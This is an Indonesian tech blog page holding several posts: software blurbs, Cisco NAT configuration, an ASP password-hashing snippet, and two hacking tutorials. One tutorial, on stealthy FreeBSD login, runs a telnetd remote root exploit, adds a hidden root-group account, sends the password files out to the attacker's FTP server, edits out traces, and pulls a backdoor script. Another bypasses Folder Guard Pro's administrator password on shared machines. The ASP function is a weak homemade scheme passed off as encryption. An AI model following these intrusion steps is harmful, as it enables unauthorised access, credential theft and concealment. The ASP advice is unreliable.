Mudah mengubah sel excel kasus dengan klik tombol! Pilih excel beberapa sel yang Anda ingin mengubah format untuk, dan voila! Hal ini dilakukan! Fitur utama: * Pilih sekelompok sel dari spreadsheet excel Anda untuk mengubah kasus untuk * Klik pada tombol untuk memilih huruf besar, huruf kecil, atau kasus yang layak (yaitu, huruf besar, dll). * Dan menikmati kemudahan penggunaan software ini untuk ms excel!

* LangOver 5.0
LangOver - Apakah baik untuk perangkat lunak ini, sih? Apakah Anda pernah mencoba mengetik dalam satu bahasa tetapi hasilnya lain? Annoying, eh?! Itu s karena layout keyboard berada di salah ll language.With LangOver Anda dapat mengubah teks Anda dengan cepat antara bahasa-bahasa. Gunakan F10 (Untuk campur-baur antara bahasa-bahasa )---------------------------------------- ------------ Cukup klik F10 - dan teks Anda akan dipasang! LangOver mendukung bahasa apa pun. Hal ini dapat mengkonversi dari APAPUN ke Bahasa INGGRIS, dan dari INGGRIS ke Bahasa APAPUN. * Gunakan SHIFT + F10 untuk mengkonversi huruf besar / huruf kecil teks: Gunakan ABCABC F6 (Untuk membalik teks )----------------------------- ------- Selain dapat membalikkan LangOver teks Anda: ABCCBA

Uppercase
* Dukungan yang tersedia berupa:
Perangkat pembuat diagram (diagramming tool). Perangkat ini berguna untuk membuat DFD (Data Flow Diagram)
Pembangkit layar dan laporan (screen and report generator). Perangkat ini dapat dipakai untuk membuat prototipe laporan dengan cara memasukkan kolom atau field data pada layar.
contoh aplikasi Uppercase

* Free StatusTitle Maker 6.1
Free StatusTitle Maker menciptakan kode JavaScript untuk menampilkan pesan dalam judul dan status bar. Anda dapat menggambarkan tujuan link dalam judul atau status bar bukannya menunjukkan URL yang terkait dengannya. Juga ada banyak efek disesuaikan termasuk: Huruf Besar Di seberang, Flash, mesin ketik huruf demi huruf dan seterusnya. Akhirnya, terdapat 19 efek untuk dikendalikan judul bar dan 19 efek untuk dikendalikan status bar.

* Yaldex StatusTitle Maker 5.0 5.1
Maker Yaldex StatusTitle menghasilkan kode JavaScript untuk menampilkan pesan dalam status atau judul bar. Sebagai contoh, Anda dapat menggambarkan tujuan link dalam status bar atau judul bukannya menunjukkan URL yang terkait dengannya. Juga ada banyak efek disesuaikan termasuk: Huruf Besar Di seberang, Flash, mesin ketik huruf demi huruf dan seterusnya. Akhirnya, terdapat 19 efek untuk dikontrol status bar dan 19 dikontrol efek untuk batang judul.

* KeyCleanse 1.0
KeyCleanse adalah kata kunci utama alat manajemen dan daftar bersih. Fitur-fiturnya termasuk menghapus duplikat, minimum dan maksimum menghapus kata-kata, kata-kata menghapus melebihi batas karakter, menyeret, menghitung, dan kata-kata untuk mengubah semua huruf besar, huruf kecil atau judul kasus. KeyCleanse menghapus kata kunci yang tidak memenuhi persyaratan Anda dan hanya meninggalkan kata kunci yang Anda butuhkan. KeyCleanse adalah aplikasi gratis.

* File Renamer Pro 2.0
File Renamer Pro adalah yang mudah digunakan File Renamer memungkinkan Anda untuk mengubah nama beberapa file dan folder sekaligus. Ini menawarkan berbagai cara untuk mengubah nama file, termasuk huruf besar, huruf kecil, mengubah nama ekstensi file, penyisipan, penghapusan, string pengganti, berurut mengubah nama dan Renamer more.File Pro dapat mengubah nama file MP3 yang didasarkan pada informasi tag ID3 (misalnya nama artis, judul dll ). Program ini memberikan preview file baru names.It mendukung drag dan drop.

* Yaldex StatusTitle Maker 6.1

Maker Yaldex StatusTitle menciptakan kode JavaScript untuk menampilkan pesan dalam judul dan status bar. Anda dapat menggambarkan tujuan link dalam judul atau status bar bukannya menunjukkan URL yang terkait dengannya. Juga ada banyak efek disesuaikan termasuk: Huruf Besar Di seberang, Flash, mesin ketik huruf demi huruf dan seterusnya. Akhirnya, terdapat 19 efek untuk dikendalikan judul bar dan 19 efek untuk dikendalikan status bar.

Mungkin itu yang saya ketahui tentang Case Tool
Terima Kasih
Read More..

Sabtu, 08 Agustus 2009

Login ke FreeBSD secara Siluman

Viva buat script kiddies, karena saya bukan hacker :P~, melainkan lamerz, pertama-tama jelas anda harus punya shell buat anda jadikan modal ngeroot server FreeBSD tersebut, terserah anda akan menggunakan exploits apa, yang jelas anda pasti lebih mengerti dari pada saya, saya kasih contoh pake remote exploit menggunakan telnetd 7350854.c

Ex :
[lee@linux .lee]$ ./bsd target.com

7350854 - x86/bsd telnetd remote root
by zip, lorian, smiler and scut.

check: PASSED, using 16mb mode

######################################

ok baby, times are rough, we send 16mb traffic to the remote telnet daemon process, it will spill badly. but then,
there is no other way, sorry...



## setting populators to populate heap address space
## number of setenvs (dots / network): 31500
## number of walks (percentage / cpu): 496140750
##
## the percentage is more realistic than the dots ;)

percent |-----------------------------------| ETA |
19.19% |......................... | 00:49:32 |

oke kita tunggu sampe dapet root

## sleeping for 10 seconds to let the process recover
## ok, you should now have a root shell
## as always, after hard times, there is a reward...


command: ÿý%id;uname -a;whoami
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 31(guest)
FreeBSD target.com 4.2-RELEASE FreeBSD 4.2-RELEASE #1: Sat Nov 25 10:13:58 CST 2000 root@target.com:/usr/src/sys/compile/MAIL i386
root

!LOL anda bisa tertawa girang anda sudah mendapatkan Root, sekarang anda siapkan jurus buat mengamankan shell FreeBSD baru anda ini, dan anda add user dulu.

/usr/sbin/pw adduser gue -g wheel -s /bin/tcsh -d /etc/.gue

Terus bikin home buat anda di shell nya

mkdir /etc/.gue

terus sekolahin tuh shell biar bisa baca tulis

/usr/sbin/chown gue.wheel -R /etc/.gue
chown: -R: No such file or directory

Wekz.!!! kok no such file , cuekin aja namanya juga lamerz sekarang kita bikin pass nya dulu

passwd gue
New password:gue1234

Retype new password:gue1234

passwd: updating the database...
passwd: done
Changing local password for gue.

okbaybeh !! sekarang anda telnet ke shell freebsd baru anda itu

FreeBSD/i386 (target.com) (ttyp3)

login: gue
Password:*****

Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.

FreeBSD 4.2-RELEASE (MAIL) #1: Sat Nov 25 10:13:58 CST 2000

Welcome to FreeBSD!

Before seeking technical support, please use the following resources:

o Security advisories and updated errata information for all releases are at http://www.FreeBSD.org/releases/ - always consult the ERRATA section for your release first as it's updated frequently.

o The Handbook and FAQ documents are at http://www.freebsd.org/ and, along with the mailing lists, can be searched by going to http://www.FreeBSD.org/search.html. If the doc distribution has been installed, they're also available formatted in /usr/share/doc.

If you still have a question or problem, please take the output of `uname -a', along with any relevant error messages, and email it as a question to the questions@FreeBSD.org mailing list. If you are unfamiliar with FreeBSD's directory layout, please refer to the hier(7) man page. If you are not familiar with man pages, type "man man".
You may also use `/stand/sysinstall' to re-enter the installation and configuration utility. Edit /etc/motd to change this login announcement.

>

nahh sekarang kita racik bumbunya, kita balik ke root tadi, kita liat file master.passwd sama passwd,

cat /etc/master.passwd
s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566: 1040::0: 0: teacher part-time: /home/professor/ACCT/ mhw:/usr/local/util/msman
gue:$1$MDoybd3Y$OBWMzMHYU8WJkRAU8hSP00: 6925:0::0:0: User &:/etc/.pupet:/bin/tcsh

ada entry baru di file tersebut, hemm admin bisa curiga neh, kita liat juga di file passwd

cat /etc/passwd
syscpa:*:1564:1040:teachers part-time 20020506:/home/professor/ACCT/syscpa:/usr/local/util/msman
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:*:6925:0:User &:/etc/.pupet:/bin/tcsh

fiiiuuuhhh ada juga, okies santee, kita ke folder /etc

cd /etc

hemm jadi gimana donkz ?... ya udah kita buka ftp, ( pake ftp account anda dimanahlah terserah anda )

ftp
open uhamka-student.net
uhamka-student.net <-= masukin login
Password:***** <-= masukin password

udah gitu loe kirim file master.passwd sama file passwd ke ftp account loe

put master.passwd

abis itu file passwd

put passwd

setelah itu anda ambil / DL file master.passwd sama file passwd tadi dari ftp anda tadi, terus anda edit, setelah itu anda buka master.passwd menggunakan notepad.

s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566:1040::0:0:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:$1$MDoybd3Y$OBWMzMHYU8WJkRAU8hSP00:6925: 0::0:0: User &:/etc/.pupet:/bin/tcsh <=-- ini anda hapus

jadi tinggal :

s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566: 1040::0:0: teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman

terus file tersebut anda save

setelah itu anda buka satu file lagi passwd, sama seperti tadi anda hapus "entry" yang baru aja anda buat pass add user

s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:*:6925:0:User &:/etc/.pupet:/bin/tcsh <-= loe hapus juga ini

jadi

s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman

setelah itu anda save

file master.passwd sama passwd di ftp account anda, anda hapus dan file master.passwd sama passwd yang sudah anda edit anda upload ke ftp account anda lagi, setelah itu anda hapus file asli yang anda root tadi

rm master.passwd
rm passwd

anda ganti sama file master.passwd dan passwd yang sudah anda edit dan sudah anda upload ke ftp account anda, terus anda kirim lagi master.passwd sama passwd hasil editan anda ke shell tadi

kita liat hasilnya

cat /etc/passwd
syscpa:*:1564:1040:teachers part-time 20020506:/home/professor/ACCT/syscpa:/usr/local/util/msman
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman

upsss !! dah tidak ada, terus hilang dong account baru kita, hemmmz tidaklah kawan, coba anda telnet lagi pake user sama pass yang tadi anda buat, kita test

FreeBSD/i386 (target.com) (ttyp4)
login: gue
Password:
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.

PUPET and AxAL At #cracxer IRC.DAl.net Welcome Guys Sorry for the admin <-= file motd-nya saya ganti


Fiuuuh masih bisa masuk, khan sudah di hapus ?? <-= jangan tanya saya, be 'coz saya khan cuma lamers, hehehehe, trus anda puas dengan hasil anda ini ngak khan..??, anda pasti ingin mendapetkan akses root, gampang saja anda tinggal cari local exploit untuk mendapatkan akses root, oke sekarang kita ambil script nya, jangan lupa root box anda tutup saja,dan anda menggunakan account baru, terus anda ambil scriptnya yang sudah anda siapkan di ftp account anda

ftp> open uhamka-student.net
Connected to uhamka-student.net.
220 ProFTPD 1.2.4 Server (AEI Web Sites) [216.52.166.48]
Name (uhamka-student.net:pupet): uhamka-student.net
331 Password required for uhamka-student.net.
Password:******
230 User uhamka-student.net logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get evelyne.sh
local: evelyne.sh remote: evelyne.sh
227 Entering Passive Mode (211,101,151,167,121,20)
150 Opening ASCII mode data connection for evelyne.sh (1023 bytes).
100% 1055 00:00 ETA
226 Transfer complete.
1055 bytes received in 1.00 seconds (1.03 KB/s)
ftp> bye

kalau sudah anda ambil scriptnya, anda racik deh, caranya:

mv evelyne.sh su

ganti chmod nya

chmod +x su

anda jalankan scriptnya

>./su
Please hit ctrl-c twice...

nah anda tekan CTRL + c ( 2 kali )

now login with user eric and password FLUE A COOK HOVE DOUR SKY
after you're logged in you can su to root with the same
password

Trying ::1...
Connected to localhost.
Escape character is '^]'.

FreeBSD/i386 (target.com) (ttyp4)
login:eric
pass :FLUE A COOK HOVE DOUR SKY

Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.

PUPET and AxAL At #cracxer IRC.DAl.net Welcome Guys Sorry for the admin
>su
s/key 97 de09623
Password:FLUE A COOK HOVE DOUR SKY
#id
uid=0(root) gid=0(root) groups=0(root), 2(kmem), 3(sys), 4(tty), 5(operator), 31(guest)
>
Nah asik khan, sekali lagi hidup lamerz and script kiddies, thanks to all my friend at #cracxer Irc.dal.net , #cracxer will be back, thanks sekali lagi buat AXAl yang dah mau ngasih opini dan nemenin saya bikin artikel ini, juga buat petualang, kaka-joe, pak-tani, notts, babah, maffias yang Lagi bobo, ERNESTO_CHE_GUEVARRA (temen buat ke dugem) heueheu VIVA #CRACXER

Daftar exploit.

bisa anda dapatkan di www.packetstormsecurity.org, www.neworder.box.sk

Tutor ini saya rasa masih banyak "kekurangan" dan perlu pembenahan lebih dalam dari para Sang Ahli, karena sekali lagi saya cuma seorang lamerz dan sangat lamerz

-Sebelumnya Terima kasih atas kritik dan sarannya dan untuk "Jasakom.com" yang sudah mempublikasikan Artikel dari "si L@mers ini" viva jasako
Read More..

Cara Menghidupkan Komputer Dengan Remote Area

Anda ingin menghidupkan PC anda dirumah secara otomatis dari kantor atau tempat lain. Hal ini cukup mudah, hanya saja PC anda harus memakai main board P2AB dan terhubung dengan modem apa saja. Dan yg lebih penting lagi modem anda terhubung ke PC dan ke line telpon.
Hubungi no telp tsb yg menghubungkan PC anda dengan modem dari tempat lain dan TA DA.......



PC anda akan segera hidup (waken up from death), hal ini dapat anda manfaatkan dengan fungsi software penerima fax pada PC anda yg dapat di pasang pada startup.
Perlu anda ketahui bahwa hal ini terjadi adalah dari setingan main board tsb.

Read More..

Konfigurasi Router NAT pada windows 2000 server

Network Address Translation (NAT) adalah suatu teknik untuk mengubah suatu IP address ke IP address yg lain. Hal ini bisa dikarenakan karena di jaringan kita mengunakan network address yg disebut private address space di RFC 1918, yaitu:
10.0.0.0 - 10.255.255.255 (10/8 prefix)
172.16.0.0 - 172.31.255.255 (172.16/12 prefix)
192.168.0.0 - 192.168.255.255 (192.168/16 prefix)
Dan karena ini adalah private address, jaringan kita tentunya tidak dapat berkomunikasi dgn jaringan lain di Internet, karena semua host yg ingin terkoneksi di Internet harus menggunakan global atau public IP address. Untuk ini kita perlu men-translate IP address kita yg private menjadi public IP address.


Alasan lain untuk menggunakan NAT adalah security. Kita bisa men-translate seluruh jaringan kita (missal 254 PC) menjadi 1 public IP. Teknik ini disebut many-to-one NAT atau biasa disebut Port Address Translation (PAT). Teknik ini sangat bermanfaat jika kita menginginkan user di jaringan kita untuk meng-inisiasi koneksi ke Internet (browsing internet atau mengirim email misalnya), tapi kita tidak menginginkan host dari Internet untk meng-inisiasi koneksi ke PC user kita.
Host dari Internet tidak bisa meng-inisiasi koneksi ke internal host kita karena hanya ada 1 public IP address yg terlihat di jaringan kita, sedangkan jumlah PC yg sebenarnya ada lebih dari 1. Tentunya jika PC kita yg meng-inisiasi, maka reply atau return packet akan bisa
kembali karena device yg kita gunakan untuk melakukan NAT, akan memiliki mapping table dari NAT yg terjadi di jaringan.
Untuk kasus one-to-one NAT, dimana 1 private IP akan di-translate menjadi 1 global IP, maka mapping nya akan spt berikut:
Router#sh ip nat tra
Pro Inside global Inside local Outside local Outside global
— 195.1.134.1 192.168.1.1 — —
— 195.1.134.2 192.168.1.2 — —
Dalam contoh ini, IP private 192.168.1.1 di-translate ke public IP 195.1.134.1, IP private 192.168.1.2 di-translate ke public IP 195.1.134.2 dst.
Inside local adalah terminologi utk real IP address PC di jaringan kita, sedangkan Inside Global adalah public IP address yg kita gunakan untuk men-translasi real IP address tsb.
Outside local adalah local IP address dari tujuan kita sebagaimana kita melihatnya dari jaringan kita. Sedangkan Outside global adalah global IP address dari tujuan kita yg terlihat di Internet.
Ini bermanfaat utk destination based NAT, sbg contoh sbg berikut:
Ada server di Internet dgn global IP address 11.11.11.11, tapi kita ingin semua users di jaringan kita utk melihat server tsb sbg 192.168.1.11
Maka kita bisa melakukan destination based NAT, dgn outside local adalah 192.168.1.11 dan outside global, IP address tujuan yg sebenernya, adalah 11.11.11.11.
Jika kita tidak melakukan destination based NAT, maka outside local dan outside global dari tujuan kita akan sama, yaitu public IP tujuan yg sebenernya, dan ini bisa dilihat di contoh mapping PAT.
Untuk contoh many-to-one NAT atau PAT, dimana banyak real IP dari PC kita di-translate menjadi 1 public IP, maka contoh mapping nya sbg berikut:
Router#sh ip nat tra
Pro Inside global Inside local Outside local Outside global
tcp 195.1.134.4:12338 192.168.1.3:12338 33.33.33.33:23 33.33.33.33:23
tcp 195.1.134.4:12337 192.168.1.2:12337 22.22.22.22:23 22.22.22.22:23
Dalam contoh ini, kita melakukan telnet (destination tcp port 23) ke remote host 22.22.22.22
dari private IP 192.168.1.2, dan telnet ke remote host 33.33.33.33 dari private IP 192.168.1.3.
Kita bisa lihat bahwa ke-2 private IP kita di-translate ke public IP yg sama, yaitu 195.1.134.4. Yg membedakan adalah source port yg digunakan di public IP.
Jadi di mapping ini terlihat bahwa koneksi dari 192.168.1.2 di map ke 195.1.134.4 port 12337, sedangkan koneksi dari 192.168.1.3 di map ke 195.1.134.4 port 12338.
Dgn adanya mapping ini, remote host 22.22.22.22 ketika mengirimkan paket reply (ingat di TCP/IP reply dari remote host destination portnya ditujukan ke source port dari host kita), akan mengirimkan paket ke 195.1.134.4 port 12337. Sedangkan reply packet dari 33.33.33.33 kan ke 195.1.134.4 port 12338.
Berdasarkan mapping tadi, NAT device atau router yg melakukan map bisa mengetahui bahwa packet reply dari 22.22.22.22 harus dikirimkan ke host 192.168.1.2 dan paket reply dari 33.33.33.33 harus dikirimkan ke host 192.168.1.3
Dari ke-2 contoh di atas kelihatan bahwa untuk normal NAT atau one-to-one NAT, setiap private IP akan memiliki public IP sendiri sehingga setiap host di jaringan kita masih bisa di hubungi dari luar. Host dari Internet masih bisa utk menghubungi tiap host kita karena
mereka memiliki public IP yg berbeda-beda.
Namun untuk kasus many-to-one NAT atau PAT, host dari Internet tidak dapat menghubungi setiap host karena semua host memiliki 1 public IP yg sama. Host dari internet hanya bisa me-reply koneksi dari host kita berdasarkan source port yg berbeda-beda.
Ok, langsung masuk contoh konfigurasi biar makin jelas. Contoh dilakukan dgn menggunakan Cisco router dgn 1 ethernet interface konek ke internal network dan 1 serial interface konek ke Internet. Kalo udah ngerti konsepnya bisa pake NAT device apa aja, gue sendiri buat memproteksi home lab gue pake OpenBSD PF.
Topologi:
Internal network – (eth0) router (s0/0) – internet
Internal network kita menggunakan private IP 192.168.1.0/24. IP address eth0 router kita 192.168.1.1 yg merupakan default gateway dari semua host di internal network.
1. Many-to-one PAT, semua private IP ke 1 public IP address
Kita cuma dapet 1 IP address dari ISP 195.1.134.2/30 yg juga merupakan IP address serial 0/0, router ISP kita menggunakan IP 195.1.134.1 yg juga merupakan default route router kita.
Maka konfigurasi PAT sbg berikut:
- Buat ACL yg mem-permit semua network 192.168.1.0/24
Router(config)#ip access-list standard internal_network
Router(config-std-nacl)#permit 192.168.1.0 0.0.0.255
- Bikin NAT rule untuk mentranslate net 192.168.1.0/24 ke 195.1.134.2 yg merupakan IP address s0/0
Router(config)#ip nat inside source list internal_network interface s0/0 overload
- enable NAT di interface e0/0 dan s0/0
Router(config)#int e0/0
Router(config-if)#ip nat inside
Router(config)#int s0/0
Router(config-if)#ip nat outside
2. ISP kita ternyata memberikan kita public IP 195.1.134.0/24, yg berarti range public IP yg bisa kita gunakan adalah 195.1.134.1 – 195.1.134.254. Ini berarti kita bisa melakukan one-to-one NAT, contoh:
192.168.1.1 ke 195.1.134.1
192.168.1.2 ke 195.1.134.2, dst.
Maka konfigurasi yg perlu dilakukan hanya:
Router(config)#ip nat inside source static network 192.168.1.0 195.1.134.0 /24
Tentunya enable NAT di e0/0 dan s0/0 spt contoh no.1
3. Kalo gak dapet persis 254 public IP gimana? Misal dapetnya 195.1.134.0/29, yg berarti range public IP yg bisa digunakan adalah 195.1.134.1-195.1.134.6 (ingat dgn /29 ada total 8 IP dari 0 sampai 7, tapi 0 adalah network address dan 7 sebagai IP terakhir merupakan
broadcast address).
Jika kita mau mentranslate net 192.168.1.0/24 ke range IP 195.1.134.1-195.1.134.6
- bikin NAT pool
Router(config)#ip nat pool public_IP 195.1.134.1 195.1.134.6 netmask 255.255.255.248
- bikin NAT rule, pake ACL internal_network spt contoh no.1 buat permit semua internal net 192.168.1.0/24
Router(config)#ip nat inside source list intenal_network pool public_IP
Jgn lupa enable NAT di e0/0 dan s0/0 spt contoh no.1
4. Ada masalah dgn contoh no.3? Ada.
Dalam 1 waktu, hanya ada 6 internal private IP yg bisa di translate ke 6 public IP. Jadi koneksi dari internal host ke 7 akan gagal dan harus menunggu sampai translation mapping timeout dan di clear, sehingga public ip kembali tersedia.
Cara mengatasinya, kita bisa bikin pool dgn 5 public IP address, dan 1 IP terakhir buat PAT. IP terakhir, 195.1.134.6 digunakan sbg IP address utk interface s0/0
Router(config)#ip nat pool public_IP 195.1.134.1 195.1.134.5 netmask 255.255.255.248
Router(config)#ip nat inside source list internal_network pool public_IP
Router(config)#ip nat inside source list internal_network interface s0/0 overload
Dgn begini, 5 private IP yg pertama akan di translate ke 5 public IP di pool, sedangkan private IP yg lain akan di translate ke ip ke-6, yg merupakan ip address dari interface s0/0.
5. Ok, ayo masuk ke contoh yg lebih advance:
Kita punya 6 public IP dari range 195.1.134.1.- 195.1.134.6
IP address 195.1.134.4 kita gunakan sbg ip address interface s0/0 router kita
IP address 195.1.134.1 digunakan oleh router ISP interface s0/0, yg merupakan default gateway router kita
IP address 195.1.134.2 mau kita gunakan sbg ip address web server kita, dgn real IP 192.168.1.2
Dan IP addres 195.1.134.3 mau kita gunakan sbg ip address mail server kita, dgn real IP 192.168.1.3
Sisanya, 195.1.134.5 dan 6, akan kita pergunakan nanti jika kita punya server2 baru
- Bikin ACL buat semua network, access-list internal_network permit 192.168.1.0 0.0.0.255
- Konfigure PAT buat semua internal network ke interface s0/0
Router(config)#ip nat inside source list internal_network interface s0/0 overload
- Bikin one-to-one NAT buat web dan mail server
Router(config)#ip nat inside source static 192.168.1.2 195.1.134.2
Router(config)#ip nat inside source static 192.168.1.3 195.1.134.3
Jgn kuatir jika terjadi overlap antara static NAT diatas dgn PAT di konfigurasi sebelumnya. Static NAT akan meng-overide rule utk 192.168.1.2 dan 192.168.1.3, sehingga ke-2 IP tsb tidak akan di PAT meskipun termasuk dlm ACL internal_network.
Jgn lupa enable NAT di interface s0/0 dan e0/0 spt contoh no.1
Dan kalo kita punya IOS Firewall dan ACL ingress in interface s0/0, maka kita harus permit koneksi dari internet ke public IP web dan mail server kita, dgn port yg terkait spt tcp 80 dan 25. Jadi di ACL ingress s0/0 jgn gunakan real IP address.
6. Kita terkoneksi dgn ISP, router kita cuman dapet 1 public IP address buat interface s0/0 tapi punya web server dan mail server? Jgn kuatir, ini bisa dilakukan dgn teknik port redirection.
Jadi, bikin dulu PAT biar internal network kita bisa konek ke Internet
Router(config)#ip nat inside source list internal_network interface s0/0 overload
Trus bikin port redirection buat traffic ke port 80 dan 25, di contoh ini private IP web server kita tetap 192.168.1.2 dan mail server 192.168.1.3
Router(config)#ip nat inside source static tcp 192.168.1.2 80 interface s0/0 80
Router(config)#ip nat inside source static tcp 192.168.1.3 25 interface s0/0 25
Dgn cara begini, traffic yg datang ke public IP interface serial port 80 akan di redirect ke real IP web server 192.168.1.2, dan traffic yg datang ke serial port 25 akan di redirect ke real IP mail server 192.168.1.3
Tinggal daftar di public DNS server untuk web dan MX record mail server kita, untuk me-resolve ke public IP router interface s0/0. Keuntungan lain dgn cara PAT ke interface adalah kita bisa saja mendapatkan IP address yg berbeda-beda (dynamic IP) setiap kali konek ke ISP.
Dgn setingan di atas, kita tidak perlu kuatir IP kita akan berubah.
Hanya mungkin public IP yg kita daftarkan untuk web dan mail server di public DNS server harus selalu di-update sesuai dgn IP address yg sedang kita dapatkan.
Mulai kerasakan The Power of NAT?

Read More..

Menjebol Password FOLDER GUARD Pro 5.2

Keamanan memang sangat penting melihat perkembangan teknologi informasi yang demikian pesat sekarang ini, namun teknologi kejahatan saat ini masih lebih unggul satu tingkat dibanding dengan pencegahannya. Tapi itu tidak menjadi landasan untuk kita bisa terus mengikuti perkembangan Teknologi security yang mungkin akan lebih maju.

Mungkin Anda pernah mendengar salah satu tools proteksi berbasis windows yang sangat terkenal yaitu FOLDER GUARD, versi terbarunya FOLDER GUARD PRO 5.3, untuk FOLDER GUARD PRO 5.2 bisa Anda cari di www.google.com, & dan cracknya di http://paulyoung.yeah.net.


Software ini memang dibilang sangat handal dibanding dengan software proteksi lainya , karena bisa menghiddenkan subkey yang berhubungan dengan system folder guard tersebut, sehingga akan membuat kita kesulitan untuk melihat sejauh mana sistem tersebut. Tapi perlu diketahui banyak software proteksi yang memberikan fitur-fitur praktis, sehingga akan memudahkan penggunanya dan akan mengundang adanya hole pada software itu sendiri, Contohnya FOLDER GUARD PRO 5.2.

Sewaktu kita instalasi software ini, kita akan diminta untuk mengeset apa yang perlu diproteksi, apakah folder atau sistem, baru kita akan diminta untuk memasukan password Administrator dan Master dan setelah itu di save.

Password Administrator berfungsi untuk kita menjalankan folder Guard, sedangkan password Master berfungsi untuk menjalankan Toggle protection sehingga proteksi proteksi folder guard bisa dibikin enabled atau disabled secara cepat tanpa perlu konfigurasi.

Nah biasanya setelah kita instalasi folder guard dia akan membuat folder di directory windows\desktop\Folder Guard. Mungkin Anda sudah nggak sabar denger ocehan saya. Sekarang coba anda klik file Reset password yang ada di \windows\desktop\Folder Guard. Setelah itu Anda akan diminta Mengisi form registrasi pertama kalian, sebelumnya saya ingatkan anda diminta mencari dulu crack buat folder guard pro 5.2 setelah itu isi form registrasi harus sama dengan yang anda isi sewaktu instalasi pertama. Nah dengan cara tersebut diatas kita akan masuk ke folder guard tanpa password.
Â

Â
Tapi yang menjadi masalah jika posisi kita diwarnet atau di kantor yang menggunakan software folder guard , tentunya kita masukin username serta registrasi code kita dg menggunakan software Cracking folder guard pro 5.2, hal itu tidak akan berhasil Karena dia akan meminta user name registrasi serta codenya sewaktu install pertama bukan registrasi code yang baru.


Sekarang bagaimana kalau di warnet atau kantor mudah saja, coba Anda copykan file Fgkey.exe, Fguard32.dll, Fguard.vxd dari komputer Anda yang ada didirektory \Program Files\WinAbility\Folder Guard\ kedalam disket, kalau sudah klik tombol start trus run, ketik regedit kalau regedit dikunci Anda import aja file .reg yang berisikan disabled registry tools dari disket Anda lalu klik kanan, kalau sudah masuk ke subkey \HKEY_LOCAL_MACHINE\Software\Winability\Folder Guard\Setup\1, setelah itu delete key yang name valuenya info.


Sekarang buat shortcut untuk file fgkey.exe yang ada di drive A, trus tambahkan options / pw,pada command line “A:\fgkey” /pw , isi nama shortcutnya dengan reset.

Â

lalu kalian klik shortcut reset tersebut kemudian klik continue pada form registrasi, jika keluar message “The Administrator's Password For Folder Guard has been reset” berarti Selamat anda telah berhasil menembus password administrator folder guard pro 5.2. Perlu diketahui cara ini juga sudah saya coba pada Folder Guard pro 5.3 yang terbaru dan berhasil, sekarang coba jalankan program folder guardnya, kalian masuk tanpa password setelah itu kalian bisa rubah setting proteksinya sekaligus mengganti passwordnya eh nggak boleh jahat. Artikel ini saya buat untuk tujuan security, sehingga para pemilik warnet bisa lebih hati-hati & waspada dalam hal proteksi sistem.


Read More..

Pemrograman ASP untuk Mengenkripsi Password

Seringkali dalam situs ada fitur login username dan password atau login khusus administrator, untuk dapat mengakses dan menggunakan berbagai fitur yang disimpan dalam database(umumnya SQL atau Access)

Namun, bagaimana jika seorang attacker mendapatkan table user dan semua password user? Ini malapetaka. Tentunya anda ingin menyembunyikan atau mengenkripsi password dalam tabel user. Berikut ini saya berikan VBscript yang dikombinasikan dengan script ASP.
untuk mengenkripsi password user. Terlebih dahulu kita membuat sebuah fungsi yang kita perintahkan untuk mengenkripsi password ke dalam karakter ASCII. Fungsi ini kita namakan fungsi enkripsi. Berikut ini adalah VBscript yang akan kita gunakan.



Function enkripsi(x1, x2)
   s = ""
   t = 0
   For i = 1 to len(x1)
       t = t + asc(mid(x1,i,1))
   Next
   For i = 1 to len(x2)
       y = (t + asc(mid(x2,i,1)) * asc(mid(x2,((i+1) mod len(x2)+1),1))) mod 255
       s = s & chr(y)
   Next
   For i = (len(x2) + 1) to 10
       If t>598.8 Then t = 598.8
       y = t^3*i mod 255
       s = s & chr(y)
   Next
   enkripsi = s
End Function

VBscript ini akan kita gunakan dalam file bernama enkripsi.asp. Lihat contohnya dibawah ini:

<%
Function enkripsi(x1, x2)
   s = ""
   t = 0
   For i = 1 to len(x1)
       t = t + asc(mid(x1,i,1))
   Next
   For i = 1 to len(x2)
       y = (t + asc(mid(x2,i,1)) * asc(mid(x2,((i+1) mod len(x2)+1),1))) mod 255
       s = s & chr(y)
   Next
   For i = (len(x2) + 1) to 10
       If t>598.8 Then t = 598.8
       y = t^3*i mod 255
       s = s & chr(y)
   Next
   enkripsi = s
End Function
%>



